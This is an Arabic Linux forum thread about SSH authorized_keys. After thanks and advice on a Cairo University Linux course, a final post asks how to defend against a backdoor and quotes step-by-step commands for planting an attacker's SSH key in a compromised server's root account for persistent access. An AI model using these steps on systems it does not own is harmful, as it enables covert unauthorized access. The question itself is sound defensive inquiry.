شرح حماية الروت والدخول للشيل - بواسطة عمل كى على الشيل AuthorizedKeys

الله يعطيك العافية والله يا استاذ L!nux Man
شرح جميل
جزاكم الله خيرا . .

جزاك الله الجنة بغير حساب
ما شاء الله
شرح ولا اروع
بانتظار جديدك المميز
ابو محمد

السلام عليكم ورحمة الله وبركاته
شكرا اخي ع الموضوع الراااااائع
انا كان ليااستفسار
انت كنت قلت ان فيه مكان لدراسة لينكس في جامعة القاهرة
كنت عاوز اعرف التفاصيل بس لاني لسا جديد وعاوز ادرس لينكس
وانت عارف ان الأسعار الكورسات نااااااااااااااار
ياريت تعرفني المكان تحديدا والتكاليف وكل حاجه ويبقى انت راجل تمام اوي
وشكرا يا قمر مقدما

الف شكر حبيبى على مرورك الرائع ياريت تشرفنى على طول بمرورك

ربنا يخليك يا محمد باشا

ويارب تكون استفدت

الله يخليك ابو محمد ولك مثله ان شاء الله

ربى يكرمك على مرورك الجميل

الاول ميرسى على مرورك الجميل

وثانيا المكان اللى بيدى كورسات فى جامعه القاهرة

هوا كلية الهندسة جامعه القاهرة بالجيزة الفرع اللى فيه قسم عمارة

اللى امام الفرع الرئيسى بالظبط

انت روح بعد امتحانات هندسة هتبتدى دورة فى اول اسبوع فى الاجازة

واسعارها مناسبة جدا أسأل على مركز الكورسات اللى فى اخر الجامعه فى مدخل الهندسة الطبية مش اللى فى الاول مسؤل الكورسات هناك اسمة استاذ جميل

ولو هتبتدى ياريت تبقى تقولنا لان فيه ناس كتير عاوزه تبتدى والمشكلة كانت فى العدد

تقبل تحياتى والمسنجر اهو لاى استفسارات

linux.man@live.com

شكرا يا محمد على الموضوع الجميل

ربنا يخليك على ردك الجميل وشرفنى اوى مرورك الجميل

ويارب يكون الموضوع فيه افادة

وهوا ده هدف مطور الاول

السلام عليكم ورحمة الله وبركاته ..

قد يكون الموضوع قديم نوعا ما لكنه مهم جدا واشكر الكاتب الحقيقه لكن لدي تساؤلات مهمه جدا بخصوص هذا الموضوع


حيث يتم استخدام الطريقه كثغره امنيه لاختراق سيرفر اخر
د
وكتبسيط للموضوع

مثلا لو حصل احدهم على حساب روت على سيرفر اخر لايمكله ثم قام بعمل الطريقه على هذا السيرفر او على سيرفر اخر يملكه ثم نسخ هذه المفاتيح للسيرفر المستهدف بالتالي سيدخل في كل مره الى حساب الروت المستهدف دون علم صاحبه فمال الحل بهذه الطريقه ؟

نريد ترقيع او حل جذري لتفاديها

هل بحذف ملف؟ وماهو الملف المسؤول عن ذلك كي يتم حذفه من السيرفر لتفادي هذا النوع من الاختراق ؟


شرح طريقة استغلالها كالتالي حسبما قرأت


في سيرفرنا الخاص نذهب إلى المسار

/root/.ssh/

بالأمر التالي

cd /root/.ssh/

ثم نقوم بتطبيق الأمر

ssh-keygen -t rsa



ستلاحظ بأنه تم توليد المفاتيح الخاصه بالعمليه بهذا الشكل:

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):


اضغط انتر الآن

ستلاحظ التالي:

Enter passphrase (empty for no passphrase):


اضغط انتر او قم بإدخال باسوورد خاص فيك وأفضل تركه بدون باسوورد والإكتفاء بزر انتر

Enter same passphrase again:


برضو أنتر
ستلاحظ الآتي


Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
80:1e:cf:80:5a:73:f5:b2:f0:dc:e7:b2:f2:cf:eb:3f root@path



تم توليد المفاتيح في سيرفرك الخاص بإسم:

id_rsa.pub
بالمسار

/root/.ssh/



الآن باقي ننسخ محتوى الملف

id_rsa.pub

إلى الملف المطلوب وهو

authorized_keys

بالأمر التالي:

cat id_rsa.pub > authorized_keys




الان المفاتيح جاهزه في الملف

authorized_keys


باقي ننقلها ونثبتها بالسيرفر المستهدف حتى تتم السيطره بنجاح

نقوم بنسخها الى السيرفر المستهدف بالأمر التالي:

scp authorized_keys root@path:/root/.ssh/



Tryag.cc = الأي بي المستهدف
/root/.ssh/ = مكان نزولها في السيرفر المستهدف


ستلاحظ وجود التالي:

The authenticity of host path)' can't be established.
RSA key fingerprint is ad:f4:82:6d:98:32:0a:6b:24:07:18:75:1f:fe:b2:ba.
Are you sure you want to continue connecting (yes/no)?



YESاكتب

ثم أنتر


بيظهر لك كذا:

Warning: Permanently added 'Tryag.cc' (RSA) to the list of known hosts.
root@path's password:


اضف باسوورد الروت للسيرفر المستهدف ثم أنتر

ستلاحظ الآتي:

authorized_keys 100% 235 0.2KB/s 00:00



تم نقل المفاتيح إلى المسار المطلوب وتستطيع الإتصال بالسيرفر المستهدف في أي وقت تشاء بالأمر التالي

ssh -l root path




بانتظر رد صاحب الموضوع او اي خبير لحل المشكله حتىى لو تمت الاستعانه بمواقع سكورتي ..
.. ضروري جدا وفي الانتظار وشكرا جزيل الشكر لكم